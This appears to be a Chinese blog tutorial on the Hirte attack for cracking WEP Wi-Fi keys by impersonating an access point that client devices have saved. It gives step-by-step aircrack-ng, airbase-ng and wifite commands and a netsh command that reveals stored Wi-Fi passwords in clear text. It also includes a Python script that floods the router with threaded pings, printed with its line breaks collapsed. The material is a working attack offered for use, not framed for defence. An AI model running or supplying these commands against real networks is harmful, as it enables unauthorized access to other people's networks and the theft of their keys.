Hirte是破解无线网络WEP Key的一种攻击类型
只要客户端设备(笔记本电脑,手机等)连接过的无线网络,那些WIFI即使是不在攻击者范围内也都能被破解,因为该wifi的WEP密钥和配置文件仍然存储在这些无线设备中。
netsh wlan show profile name="cisco-432F" key=clear
实施这种攻击的要求是建立一个和WEP网络相同的SSID假冒接入点。当客户端设备尝试自动连接到无线网络设时,假冒接入点(攻击者机器)会对受害者设备进行ARP攻击,导致受害者设备将包含密钥流的数据包发出。
1.安装一个假的WEP AP(wifi名,mac地址要相同)并等待客户端连接
2.客户端的连接等待自动分配IP地址
3.客户端发送一个ARP数据包
4.获得了ARP分组,并且将其转换成一个ARP请求为同一客户机
5.客户回复
6.收集这些数据包
7.破解WEP密钥
ip a
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng wlan0mon --bssid D8:24:BD:79:18:0B --write HSEK
--bssid:AP的mac地址
--write:保存文件
命令执行后,会在当前目录下生成五个文件
airbase-ng -c 1 -a D8:24:BD:79:18:0B --essid "cisco-1809" -W 1 -N wlan0mon
-c:信道
-a:模拟AP的MAC地址
--essid:wifi的名称
-W:设置加密位
-N:使Hirte攻击模式
wlan0mon:是接口
aircrack-ng HSEK-01.cap
破解密码是有要求的,第一次ivs必须要大于5000,当小于这个数的话,就会提示
wifite -wep -hirte
选择要破解的NUM
ping -t 192.168.1.1 //路由器的地址
python cmd.py
将下列代码保存为cmd.py 注意192.168.1.1这里填写你的路由器地址,我的是这个,你们的可能会有不同
import os
import threading
import timeclass myThread (threading.Thread):def __init__(self):threading.Thread.__init__(self)def run(self):cmd="ping /t 192.168.1.1"os.system(cmd)time.sleep(0.1)threads=[]for i in range(180):thread1 = myThread()thread1.start()threads.append(thread1)for item in threads:item.join()print ("退出主线程")
上一篇:调优慢 SQL
下一篇:利用colab实现AI绘画自由